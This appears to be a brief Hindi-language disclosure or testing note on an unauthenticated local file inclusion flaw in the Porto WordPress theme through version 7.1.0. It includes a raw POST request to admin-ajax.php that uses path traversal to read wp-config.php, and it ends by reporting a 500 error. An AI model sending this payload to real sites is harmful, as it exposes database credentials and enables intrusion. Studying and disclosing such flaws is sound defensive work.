
Porto <= 7.1.0 - porto_ajax_posts के माध्यम से अनधिकृत स्थानीय फ़ाइल समावेशन
Porto <= 7.1.0 - अप्रमाणित स्थानीय फ़ाइल समावेशन porto_ajax_posts के माध्यम से
WordPress के लिए Porto थीम 'porto_ajax_posts' फ़ंक्शन के माध्यम से सभी संस्करणों (7.1.0 तक और इसमें शामिल) में स्थानीय फ़ाइल समावेशन के लिए संवेदनशील है। यह अप्रमाणित हमलावरों को सर्वर पर मनमानी फ़ाइलों को शामिल करने और निष्पादित करने में सक्षम बनाता है, जिससे उन फ़ाइलों में किसी भी PHP कोड का निष्पादन संभव हो जाता है। इसका उपयोग पहुँच नियंत्रण को बायपास करने, संवेदनशील डेटा प्राप्त करने, या कोड निष्पादन प्राप्त करने के लिए किया जा सकता है जहाँ php फ़ाइल प्रकार अपलोड और शामिल किया जा सकता है।
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116
action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}
अभी 500 त्रुटि मिल रही है।